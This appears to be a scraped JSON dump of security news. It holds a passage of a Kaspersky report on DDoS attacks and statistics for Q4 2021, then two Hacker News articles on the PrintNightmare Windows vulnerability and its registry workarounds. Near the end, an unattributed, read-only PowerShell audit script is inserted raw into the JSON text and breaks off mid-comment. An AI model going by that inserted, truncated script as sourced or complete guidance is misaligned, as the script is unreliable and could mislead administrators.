As for DDoS attacks themselves, media in the Philippines came under repeated fire during the past quarter. In mid-November, the online outfit [PinoyMedia Center](<https://newsinfo.inquirer.net/1518615/alternative-media-site-shuts-down-after-cyberattack>) was flooded; then in the first half of December the same fate befell the [news portal ABS-CBN News](<https://www.rappler.com/technology/abs-cbn-news-website-latest-victim-cyberattack/>), followed by the [media organization VERA Files](<https://verafiles.org/articles/vera-files-overcomes-cyberattack>); the digital media company Rappler was also [attacked several times](<https://www.rappler.com/technology/rappler-website-weathers-another-ddos-attack/>) a month by unknown actors. Also in Q4, the [Indonesian journalism initiative Project Multatuli](<https://www.thejakartapost.com/life/2021/10/07/project-multatuli-digitally-attacked-after-reporting-on-police-inaction-in-rape-case.html>) got DDoSed after publishing an article criticizing the work of local law enforcement agencies.

Cybercriminals also targeted tech companies this quarter. The Polish arm of T-Mobile reported the [largest ever attack on this sector in the country](<https://www.reuters.com/business/media-telecom/polish-t-mobile-unit-faces-cyber-attack-systems-not-compromised-2021-12-03/>), which, however, was repelled. Another DDoS target was the blockchain platform [Solana](<https://cointelegraph.com/news/solana-reportedly-hit-by-ddos-attack-but-network-remains-online>). Blockasset, an NFT marketplace powered by Solana, was the first to draw attention to the attack.
The company noted that the DDoS had caused a slowdown in token distribution. GenesysGo, a Solana-based infrastructure provider, also noted some services were working intermittently, but assured there was no major cause for concern.

The DDoS attacks on VoIP providers continued. In early October, [British company VoIP Unlimited](<https://www.ispreview.co.uk/index.php/2021/10/ddos-attack-hits-voip-and-internet-provider-voip-unlimited-again.html>) fell victim again, having been attacked by DDoS extortionists last quarter. The new wave of junk traffic was accompanied by a ransom demand. Similar attacks affected [various other British providers](<https://www.bbc.com/news/technology-59053876>). And in November, clients of VoIP provider [Telnyx](<https://www.bleepingcomputer.com/news/security/telnyx-is-the-latest-voip-provider-hit-with-ddos-attacks/>) worldwide were hit by outages. The perpetrators could be the REvil group, which is linked to past attacks on VoIP providers and was [liquidated](<https://www.bbc.com/news/technology-59998925>) by Russian law enforcement agencies in January, after the US authorities had supplied information about the attackers.

In Q4, besides VoIP providers, [e-mail service providers](<https://therecord.media/ddos-attacks-hit-multiple-email-providers/>) were targeted by ransom DDoS (RDoS) campaigns. Those affected were mostly small companies that provide secure and private e-mail accounts by subscription or invitation: Runbox, Posteo, Fastmail, TheXYZ, Guerrilla Mail, Mailfence, Kolab Now and RiseUp. The attackers called themselves Cursed Patriarch and demanded a ransom of 0.06 BTC from victims (around US$4,000 at the time of the attack).

Ransomwarers continued to use DDoS as additional leverage.
For instance, right from the start the new Yanluowang ransomware [threatens to DDoS victims](<https://www.bleepingcomputer.com/news/security/new-yanluowang-ransomware-used-in-targeted-enterprise-attacks/>) if "they take the attackers for fools." Besides Yanluowang, the [HelloKitty ransomware](<https://securityintelligence.com/news/hellokitty-ransomware-group-ddos-extortion/>) group, known for [attacking](<https://www.kaspersky.com/blog/cd-projekt-ransomware-attack/38701/>) CD Projekt, the developer of _The Witcher_ and _Cyberpunk 2077_, added DDoS to its arsenal.\n\nSpeaking of games: attackers in Q4 did not leave gamers alone. In October, _Apex Legends_ players [set a record](<https://www.invenglobal.com/articles/15279/apex-players-win-longest-match-in-history-due-to-ddos-attack>) for the longest match ever, because the server was DDoSed throughout. And attacks on Blizzard in [November](<https://www.techtimes.com/articles/268483/20211124/activision-blizzard-s-battle-net-down-battle-net-ddos-attack-call-of-duty-warzone-minor-outage-overwatch-minor-outage.htm>) and [December](<https://www.digitaltrends.com/gaming/blizzard-hit-with-another-ddos/>) led to problems with accessing certain games, in particular _Overwatch_ and _World of Warcraft_. Players themselves also got it in the neck. Among those who [suffered](<https://dotesports.com/streaming/news/twitch-streamers-sodapoppin-xqc-nick-polom-get-ddosd-after-ip-leak>) were several popular streamers, likely due to an IP leak from the new title _Crab Game_: the streamers experienced issues after playing the game. Meanwhile, some _Dead by Daylight_ streamers were not only DDoSed, but [doxxed](<https://encyclopedia.kaspersky.com/glossary/doxxing/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) and swatted (the act of making a false report to the police with the intention of having a real-life SWAT team sent to the target's home). 
One of the victims tweeted that, during such a fake call, one of the police officers recognized him because he himself plays _Dead by Daylight_. How exactly the attackers got hold of the streamers' IP addresses and other data is unknown.\n\nhttps://twitter.com/Elix_9/status/1458330303437574149\n\nFans of _Titanfall 2_, fed up with DDoS attacks, took the initiative in Q4 and [created a mod](<https://www.pcgamer.com/titanfall-2-gets-fan-made-custom-servers-on-pc/>) for playing on custom servers if the official ones are down. Tracking the IP of a private server to flood it with junk traffic is not child's play, so this measure greatly reduces the likelihood of DDoS.\n\nSuccesses in the fight against botnets were reflected in Q4 news. In October, for instance, Ukrainian police [arrested](<https://therecord.media/ukraine-arrests-operator-of-ddos-botnet-with-100000-bots/>) the operator of a DDoS botnet consisting of 100,000 infected devices. And in December, Google [filed a lawsuit](<https://threatpost.com/google-glupteba-botnet-lawsuit/176826/>) against the operators of another botnet, Glupteba. The Internet giant also took steps to eliminate the botnet itself by blocking 63 million malicious documents, 908 cloud projects, more than a thousand Google accounts and a further 870 Google Ads accounts. Google also worked with other companies to shut down the botnet's C2 servers. Glupteba consists of a million infected IoT devices and Windows computers. The botnet can also install proxy servers on infected devices, mine cryptocurrency and conduct DDoS attacks. In addition, Glupteba uses the Bitcoin blockchain to store the addresses of backup C2 servers, making it harder to defeat. According to Kaspersky, it was this botnet that facilitated the spread of the notorious M\u0113ris last quarter.\n\nOne last thing, attackers regularly carry out DDoS attacks on each other. 
In November, unknown actors [tried to take down](<https://www.bleepingcomputer.com/news/security/dark-web-market-cannazon-shuts-down-after-massive-ddos-attack/>) the dark-web marketplace Cannazon, which, as the name suggests, specializes in the sale of cannabis. The resource was shut down shortly afterwards, but its administrators [claim](<https://www.techradar.com/news/dark-web-marketplace-bites-the-dust-after-colossal-ddos-attack>) they had long planned to close it anyway, and the DDoS was a convenient pretext to act sooner rather than later.\n\n## Quarter and year trends\n\nQ4 played out in line with our forecasts: we saw impressive growth in the number of DDoS attacks, setting a new record in the history of our observations. Let's look at the figures:\n\n_Comparative number of DDoS attacks, Q3 and Q4 2021, and Q4 2020. Q4 2020 data is taken as 100% ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154544/01-en-ddos-report-q4.png>))_\n\nThe number of attacks in Q4 increased by 52% against the previous quarter and more than 4.5 times against the same period last year. The numbers look scary, but instead of rushing to conclusions, it is better to work out why they are what they are.\n\nLet's start with the increase in the number of DDoS attacks relative to Q3. Such growth in the last three months of the year is a traditional seasonal fluctuation that we predict (and that occurs) pretty much every year. Towards the end of the year, life steps up a gear, and this cannot fail to affect the DDoS market: competition in retail hots up, students sit exams, various activists become more lively; all this leads to an increase in the number of attacks.\n\nIn addition, the size of the DDoS market is inversely proportional to that of the cryptocurrency market, which we've written about several times. 
This is because DDoS and mining capacities are partially interchangeable, so botnet owners tend to deploy them in mining when cryptocurrency prices are high and in DDoS when they fall. We witnessed precisely that in Q4, and not for the first time: a rise in the number of DDoS attacks amid a sharp drop in the value of cryptocurrencies.\n\nBoth of these factors \u2014 seasonal fluctuations and falling cryptocurrency prices \u2014 buoyed the DDoS attack market throughout Q4, hence the 1.5-fold increase. This becomes even clearer when viewing the stats by month: October accounted for 16% of all DDoS attacks in Q4, November 46% and December 38%.\n\n_Percentage distribution of DDoS attacks by month, Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154631/02-en-ddos-report-q4.png>))_\n\nNow let's see where the frightening 4.5-fold increase relative to the previous year came from. In contrast to 2021's all-time high Q4, 2020 posted a record low. In Q4 2020, we observed the opposite situation: a declining DDoS market against the backdrop of rampant cryptocurrency prices. In fact, the DDoS market spent just about the whole of 2021 recovering from this collapse, hence such impressive growth: in essence, 2021's all-time high divided by 2020's all-time low.\n\nThe diagram below clearly shows the increase in the number of DDoS attacks over the year, as well as peaks attributable to the cryptocurrency collapse in the summer of 2021 and at the end of the year.\n\n_Dynamics of DDoS attacks, October 2020\u2013December 2021; October 2020 data is taken as 100% ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154708/12-en-ddos-report-q4.png>))_\n\nAs for DDoS targets, the cross-industry distribution of attacks was fairly even \u2014 we cannot say that DDoS activity was higher in any particular sector. 
Perhaps the only thing of note was the spike in attacks on educational resources in November (largely in the Moscow region) and December (largely in the Republic of Tatarstan). We cannot pinpoint the reason for this, but most likely the attacks were related to regional specifics in the field of education, for example, the exam or vacation schedule.\n\n## DDoS attack statistics\n\n### Methodology\n\nKaspersky has a long history of combating cyberthreats, including DDoS attacks of any type and complexity. Company experts monitor botnets using the Kaspersky DDoS Intelligence system.\n\nA part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes commands received by bots from C2 servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.\n\nThis report contains DDoS Intelligence statistics for Q4 2021.\n\nIn the context of this report, the incident is counted as a single DDoS attack only if the interval between botnet activity periods does not exceed 24 hours. If the same resource is attacked by the same botnet after an interval of 24 hours or more, two attacks will be counted. Bot requests originating from different botnets but directed at one resource also count as separate attacks.\n\nThe geographic locations of DDoS attack victims and C2 servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.\n\nDDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky. 
Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.\n\n### Quarter summary\n\n * Most of all, attackers in Q4 took aim at US-based resources: the country accounts for 43.55% of attacks and 44.54% of unique targets.\n * Our DDoS Intelligence system recorded 86,710 DDoS attacks.\n * The quarter's quietest days fell on Chinese Singles' Day and Black Friday, two mega shopping events.\n * 94.29% of attacks lasted less than 4 hours.\n * Half of the DDoS attacks were carried out by means of UDP flooding.\n * 46.49% of the botnet C2 servers were located in the US.\n * 70.96% of attacks on Kaspersky SSH honeypots were carried out by bots in Russia.\n\n### DDoS attacks geography\n\nIn Q4, as in previous quarters in 2021, the bulk of DDoS attacks targeted US-based resources (43.55%). And the country's share in the geographic distribution rose once more. China (9.96%) returned to second place, up 2.22 p.p. on the previous reporting period, while the Hong Kong SAR (8.80%) took bronze: its share fell by a factor of more than 1.5 against the previous quarter.\n\n_Distribution of DDoS attacks by country and territory, Q3 and Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154746/03-en-ddos-report-q4.png>))_\n\nThe share of attacks increased in Germany (4.85%) and France (3.75%), which moved up to fourth and fifth positions, respectively. Canada (3.64%) remained in sixth place, the UK (3.21%) climbed to seventh, while eighth spot in Q4 went to the Netherlands (2.75%), where things had been relatively calm in the previous reporting period. Rounding out the TOP 10 countries and territories by number of attacks at the end of 2021 are Singapore (2.68%) and Brazil (2.08%), whose share more than halved from the previous quarter.\n\nAs usual, the geography of unique targets mirrored the distribution of individual attacks. 
Most targets were located in the US (44.54%), whose share increased compared to the previous quarter. Second and third places went to the Hong Kong SAR (9.07%) and China (8.12%), respectively.\n\n_Distribution of unique targets by country and territory, Q3 and Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154823/04-en-ddos-report-q4.png>))_\n\nIn fourth place by number of targets is Germany (4.67%), followed in fifth by the UK (3.58%). Next come France (3.28%) and Canada (2.98%). The share of these four countries increased slightly in Q4, and they moved up one rank from Q3. Eighth by number of unique targets was the Netherlands (2.76%), whose share almost doubled, and rounding out the TOP 10, as in the ranking by number of attacks, were Singapore (2.49%) and Brazil (2.37%), whose share almost halved.\n\n### Dynamics of the number of DDoS attacks\n\nDuring Q4, our DDoS Intelligence system recorded 86,710 DDoS attacks on resources worldwide. In contrast to the previous reporting period, which saw several unusually stormy days, the attacks were distributed relatively evenly throughout the quarter: from 500 to 1,500 per day. However, we did see a surge in DDoS activity on October 11, with 2,606 attacks in 24 hours. November, meanwhile, was marked by two notable drops in DDoS activity: on November 9\u201311 and 23\u201330, the number of attacks fell below 500 per day. Curiously, the first drop came on Chinese Singles' Day and the second on Black Friday. Both dates are associated with massive online sales, which tend to cause a spike in various kinds of web attacks.\n\n_Dynamics of the number of DDoS attacks, Q4 2021 ([download](<https://khub-media.s3.eu-west-1.amazonaws.com/wp-content/uploads/sites/58/2022/02/09160339/05-en-ru-es-ddos-report-q4.png>))_\n\nAs we noted above, Q4 lacked the dramatic bursts of DDoS activity seen in its predecessor. 
This was reflected also in the distribution of attacks by day of the week: the spread between the most and least active days was 5.02%, down 2.72 p.p. on Q3. We observed the most DDoS attacks on Sundays (16.61%) \u2014 this day's share in the distribution of attacks climbed by 0.66 p.p.; Thursday (11.59%) remained the quietest day, despite its share increasing slightly. The shares of Monday (15.78%), Tuesday (14.17%) and Friday (14.58%) also increased, while those of Wednesday (12.67%) and Saturday (14.60%) decreased, with Wednesday in Q4 being the second calmest day after Thursday.\n\n_Distribution of DDoS attacks by day of the week, Q3 and Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154916/06-en-ddos-report-q4.png>))_\n\n### Duration and types of DDoS attacks\n\nIn Q4, we observed an increase in the share of very short (less than 4 hours) DDoS attacks, which accounted for 94.29% of the total, plus a significant drop in the number of long ones: only 0.02% of attacks lasted more than 100 hours. What's more, the longest attack in the quarter was one-third shorter than the longest in the previous reporting period \u2014 218 hours, or just over nine days. Consequently, the average DDoS attack duration fell once more, this time to just under two hours.\n\n_Distribution of DDoS attacks by duration, Q3 and Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154944/07-en-ddos-report-q4.png>))_\n\nIn terms of attack types, in Q4 we again saw a redistribution of forces. UDP flooding came out on top again, with more than half of all attacks deploying this method. The share of TCP flooding (30.75%) also increased markedly, while that of SYN flooding (16.29%) decreased more than three times. 
HTTP (1.33%) and GRE flooding (1.32%) stayed put, although their shares increased slightly.\n\n_Distribution of DDoS attacks by type, Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09155033/08-en-ddos-report-q4.png>))_\n\n### Geographic distribution of botnets\n\nThe most botnet C2 servers active in Q4 were located in the US (46.49%), whose share increased by 3.05 p.p. against the previous reporting period. The Netherlands (10.17%) and Germany (7.02%) swapped places. A further 6.78% of C2 servers were located in the Czech Republic, whose share grew almost by 3 p.p., while Canada and the UK each had a 3.15% slice. France hosted 2.91% of the active botnet infrastructure, while 2.66% of C2 servers operated out of Russia. Also in the TOP 10 countries by location of botnets were Vietnam (1.94%) and Romania (1.45%).\n\n_Distribution of botnet C2 servers by country, Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09155106/09-en-ddos-report-q4.png>))_\n\n### Attacks on IoT honeypots\n\nAs for bots attempting to expand botnets in Q4, the largest share of devices that attacked Kaspersky SSH honeypots were located in China (26.73%), the US (11.20%) and Germany (9.05%). At the same time, the share of the first two countries decreased, while the latter added 3.47 p.p. against Q3. Another 5.34% of active bots were located in Vietnam, and 5.13% in Brazil. That said, the vast majority of attacks on our honeypots (70.96%) originated in Russia, where only 2.75% of attacking devices were located; while Vietnam accounted for just 7.94% of attacks, and the US 4.84%. 
This most likely means that at least one Russian bot showed a high level of performance.\n\n_Geographic distribution of devices from which attempts were made to attack Kaspersky SSH honeypots, Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09155150/10-en-ddos-report-q4.png>))_\n\nMost of the devices that attacked our Telnet traps, as in the previous quarter, were situated in China (44.88%), India (12.82%) and Russia (5.05%). The first country's share increased by 3.76 p.p., while the latter two saw a drop of 2.4 and 0.93 p.p., respectively. The lion's share of attacks on Kaspersky honeypots came from China (65.27%).\n\n_Geographic distribution of devices from which attempts were made to attack Kaspersky Telnet honeypots, Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09155228/11-en-ddos-report-q4.png>))_\n\n## Conclusion\n\nOn the one hand, Q4 met our expectations for this period; on the other, it surprised us. For example, instead of the expected increase in DDoS activity during major online sales, we saw a botnet lull. A feature of the quarter was the large number of very short DDoS attacks, as well as a slew of media reports about short but powerful attacks.\n\nNow for our forecasts. Going by previous years' trends, we expect Q1 2022 to produce roughly the same indicators as Q4 2021. But the situation in the world and, in particular, the cryptocurrency market is too volatile to make such a confident prediction. The bitcoin price has fallen to half its peak value, but remains high. It suffered a similar collapse in the middle of last year, but after that grew even stronger. If cryptocurrencies shoot up again, we could see a significant drop in the DDoS attack market, but if they sink even further, we will probably see an increase. It is impossible to predict which way it will go. 
But despite the lack of concrete information, we see no preconditions for any major fluctuations, and expect figures similar to those in Q4.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-10T10:00:04", "type": "securelist", "title": "DDoS attacks in Q4 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6079", "CVE-2021-22205", "CVE-2021-36260", "CVE-2021-44228"], "modified": "2022-02-10T10:00:04", "id": "SECURELIST:52D1B0F6F56EE960CC02B969556539D6", "href": "https://securelist.com/ddos-attacks-in-q4-2021/105784/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:22", "description": "[](<https://thehackernews.com/images/-wbLrBJlJCfE/YOUa-690-KI/AAAAAAAADG0/6tT84mGPz6gQ_5vYBxhkEE_spk0LW4WpwCLcBGAsYHQ/s0/windows-patch-update.jpg>)\n\nMicrosoft has shipped an [emergency out-of-band security update](<https://docs.microsoft.com/en-us/windows/release-health/windows-message-center#1646>) to address a critical zero-day vulnerability \u2014 known as \"PrintNightmare\" \u2014 that affects the Windows Print Spooler service and can 
permit remote threat actors to run arbitrary code and take over vulnerable systems.\n\nTracked as [CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>) (CVSS score: 8.8), the remote code execution flaw impacts all supported editions of Windows. Last week, the company warned it had detected active exploitation attempts targeting the vulnerability.\n\n\"The Microsoft Windows Print Spooler service fails to restrict access to functionality that allows users to add printers and related drivers, which can allow a remote authenticated attacker to execute arbitrary code with SYSTEM privileges on a vulnerable system,\" the CERT Coordination Center said of the issue.\n\nIt's worth noting that PrintNightmare includes both remote code execution and a [local privilege escalation](<https://github.com/calebstewart/CVE-2021-1675>) vector that can be abused in attacks to run commands with SYSTEM privileges on targeted Windows machines.\n\n[](<https://thehackernews.com/images/-NzUbsCmtpLU/YOUekekqtnI/AAAAAAAADG8/HwnD7Xq3_iYftG9BrRvS1tJxIBOomRzXgCLcBGAsYHQ/s0/lpe.jpg>)\n\n\"The Microsoft update for CVE-2021-34527 only appears to address the Remote Code Execution (RCE via SMB and RPC) variants of the PrintNightmare, and not the Local Privilege Escalation (LPE) variant,\" CERT/CC vulnerability analyst Will Dormann [said](<https://www.kb.cert.org/vuls/id/383432>).\n\nThis effectively means that the incomplete fix could still be used by a local adversary to gain SYSTEM privileges. 
As workarounds, Microsoft recommends stopping and disabling the Print Spooler service or turning off inbound remote printing through Group Policy to block remote attacks.\n\nGiven the criticality of the flaw, the Windows maker has issued patches for:\n\n * Windows Server 2019\n * Windows Server 2012 R2\n * Windows Server 2008\n * Windows 8.1\n * Windows RT 8.1, and\n * Windows 10 (versions 21H1, 20H2, 2004, 1909, 1809, 1803, and 1507)\n\nMicrosoft has even taken the unusual step of issuing the fix for Windows 7, which officially reached the end of support as of January 2020.\n\nThe [update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), however, does not include Windows 10 version 1607, Windows Server 2012, or Windows Server 2016, for which the Redmond-based company stated patches will be released in the forthcoming days.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-07T03:11:00", "type": "thn", "title": "Microsoft Issues Emergency Patch for Critical Windows PrintNightmare Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-07T03:38:13", "id": "THN:42B8A8C00254E7187FE0F1EF2AF6F5D7", "href": "https://thehackernews.com/2021/07/microsoft-issues-emergency-patch-for.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:22", "description": "[](<https://thehackernews.com/images/-4tveTym6-fk/YOZ_5ZwEbHI/AAAAAAAADHs/xXSCpfsipXYpe6tJM2SGaTIDUE9dVGoGwCLcBGAsYHQ/s0/PrintNightmare-Vulnerability-Patch.jpg>)\n\nEven as Microsoft [expanded patches](<https://docs.microsoft.com/en-us/windows/release-health/windows-message-center>) for the so-called [PrintNightmare vulnerability](<https://thehackernews.com/2021/07/how-to-mitigate-microsoft-print-spooler.html>) for Windows 10 version 1607, Windows Server 2012, and Windows Server 2016, it has come to light that the fix for the remote code execution exploit in the Windows Print Spooler service can be bypassed in certain scenarios, effectively defeating the security protections and permitting attackers to run arbitrary code on infected systems.\n\nOn Tuesday, the Windows maker issued an [emergency out-of-band update](<https://thehackernews.com/2021/07/microsoft-issues-emergency-patch-for.html>) to address [CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>) (CVSS score: 8.8) after the flaw was accidentally disclosed by researchers from Hong Kong-based cybersecurity firm Sangfor late last month, at which point it emerged that the issue was different from another bug \u2014 tracked as [CVE-2021-1675](<https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html>) \u2014 that was patched by Microsoft on June 8.\n\n\"Several days ago, two security vulnerabilities 
were found in Microsoft Windows' existing printing mechanism,\" Yaniv Balmas, head of cyber research at Check Point, told The Hacker News. \"These vulnerabilities enable a malicious attacker to gain full control on all windows environments that enable printing.\"\n\n\"These are mostly working stations but, at times, this relates to entire servers that are an integral part of very popular organizational networks. Microsoft classified these vulnerabilities as critical, but when they were published they were able to fix only one of them, leaving the door open for explorations of the second vulnerability,\" Balmas added.\n\nPrintNightmare stems from bugs in the Windows [Print Spooler](<https://docs.microsoft.com/en-us/windows/win32/printdocs/print-spooler>) service, which manages the printing process inside local networks. The main concern with the threat is that non-administrator users had the ability to load their own printer drivers. This has now been rectified.\n\n\"After installing this [update] and later Windows updates, users who are not administrators can only install signed print drivers to a print server,\" Microsoft [said](<https://support.microsoft.com/en-us/topic/july-7-2021-kb5004948-os-build-14393-4470-out-of-band-fb676642-a3fe-4304-a79c-9d651d2f6550>), detailing the improvements made to mitigate the risks associated with the flaw. 
\"Administrator credentials will be required to install unsigned printer drivers on a printer server going forward.\"\n\nPost the update's release, CERT/CC vulnerability analyst Will Dormann cautioned that the patch \"only appears to address the Remote Code Execution (RCE via SMB and RPC) variants of the PrintNightmare, and not the Local Privilege Escalation (LPE) variant,\" thereby allowing attackers to abuse the latter to gain SYSTEM privileges on vulnerable systems.\n\nNow, further testing of the update has revealed that exploits targeting the flaw could [bypass](<https://twitter.com/gentilkiwi/status/1412771368534528001>) the [remediations](<https://twitter.com/wdormann/status/1412813044279910416>) entirely to gain both local privilege escalation and remote code execution. To achieve this, however, a [Windows policy](<https://docs.microsoft.com/en-us/troubleshoot/windows-server/printing/use-group-policy-to-control-ad-printer>) called '[Point and Print Restrictions](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/group-policy/point-print-restrictions-policies-ignored>)' must be enabled (Computer Configuration\\Policies\\Administrative Templates\\Printers: Point and Print Restrictions), using which malicious printer drivers could be potentially installed.\n\n\"Note that the Microsoft update for CVE-2021-34527 does not effectively prevent exploitation of systems where the Point and Print NoWarningNoElevationOnInstall is set to 1,\" Dormann [said](<https://www.kb.cert.org/vuls/id/383432>) Wednesday. 
Microsoft, for its part, [explains in its advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) that \"Point and Print is not directly related to this vulnerability, but the technology weakens the local security posture in such a way that exploitation will be possible.\"\n\nWhile Microsoft has recommended the nuclear option of stopping and disabling the Print Spooler service, an [alternative workaround](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) is to enable security prompts for Point and Print, and limit printer driver installation privileges to administrators alone by configuring the \"RestrictDriverInstallationToAdministrators\" registry value to prevent regular users from installing printer drivers on a print server.\n\n**UPDATE:** In response to CERT/CC's report, Microsoft [said](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) on Thursday:\n\n\"Our investigation has shown that the OOB [out-of-band] security update is working as designed and is effective against the known printer spooling exploits and other public reports collectively being referred to as PrintNightmare. All reports we have investigated have relied on the changing of default registry setting related to Point and Print to an insecure configuration.\"
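A read-only check for the workarounds just described, as an added example (it is not code from The Hacker News, Microsoft or CERT/CC). It assumes that the Point and Print values named in the article and the KB5005010 RestrictDriverInstallationToAdministrators value live under the HKLM PointAndPrint policy key used below, and that the Group Policy for inbound remote printing is backed by the RegisterSpoolerRemoteRpcEndPoint value in the parent Printers key; the function name Get-PrintNightmareExposure, the companion value UpdatePromptSettings and the status labels are the example's own.

```powershell
# Added example, not from the article or from Microsoft: audits one Windows host for the
# PrintNightmare (CVE-2021-34527) mitigations discussed above. It changes nothing and needs
# only ordinary read access to the registry and the service control manager.
# Assumed registry locations (labelled as assumptions in the lead-in):
#   $PointAndPrintKey  - NoWarningNoElevationOnInstall, UpdatePromptSettings,
#                        RestrictDriverInstallationToAdministrators (KB5005010)
#   $PrintersPolicyKey - RegisterSpoolerRemoteRpcEndPoint (2 = refuse remote client connections)
function Get-PrintNightmareExposure {
    [CmdletBinding()]
    param(
        [string]$PointAndPrintKey  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint',
        [string]$PrintersPolicyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers'
    )

    $findings = [System.Collections.Generic.List[object]]::new()

    # Small helpers: build one finding row, and render an absent value as "not set" rather than blank.
    function New-Finding([string]$Check, $Value, [string]$Status, [string]$Note) {
        [pscustomobject]@{ Check = $Check; Value = $Value; Status = $Status; Note = $Note }
    }
    function Show-Value($v) { if ($null -eq $v) { 'not set (default)' } else { $v } }

    # 1. Print Spooler service. Stopped and disabled is Microsoft's primary workaround; anything
    #    else means the spooler RPC surface is still reachable and the checks below must hold.
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    if (-not $spooler) {
        $findings.Add((New-Finding 'Print Spooler service' 'not installed' 'OK' 'No spooler, no PrintNightmare exposure'))
    } elseif ($spooler.Status -eq 'Stopped' -and $spooler.StartType -eq 'Disabled') {
        $findings.Add((New-Finding 'Print Spooler service' 'Stopped/Disabled' 'OK' 'Primary Microsoft workaround in place'))
    } else {
        $findings.Add((New-Finding 'Print Spooler service' "$($spooler.Status)/$($spooler.StartType)" 'REVIEW' 'Spooler active; rely on the Point and Print checks below'))
    }

    # 2. Inbound remote printing (Group Policy "Allow Print Spooler to accept client connections").
    #    Refusing connections blocks the remote (RCE) path but does nothing for the local LPE variant.
    $remote = (Get-ItemProperty -Path $PrintersPolicyKey -ErrorAction SilentlyContinue).RegisterSpoolerRemoteRpcEndPoint
    $findings.Add((New-Finding 'RegisterSpoolerRemoteRpcEndPoint' (Show-Value $remote) $(if ($remote -eq 2) { 'OK' } else { 'REVIEW' }) 'Set to 2 to refuse remote client connections'))

    # 3-5. Point and Print values. An absent key simply means Windows defaults apply.
    $pp = Get-ItemProperty -Path $PointAndPrintKey -ErrorAction SilentlyContinue

    # NoWarningNoElevationOnInstall = 1 is the insecure setting CERT/CC flagged: with it set,
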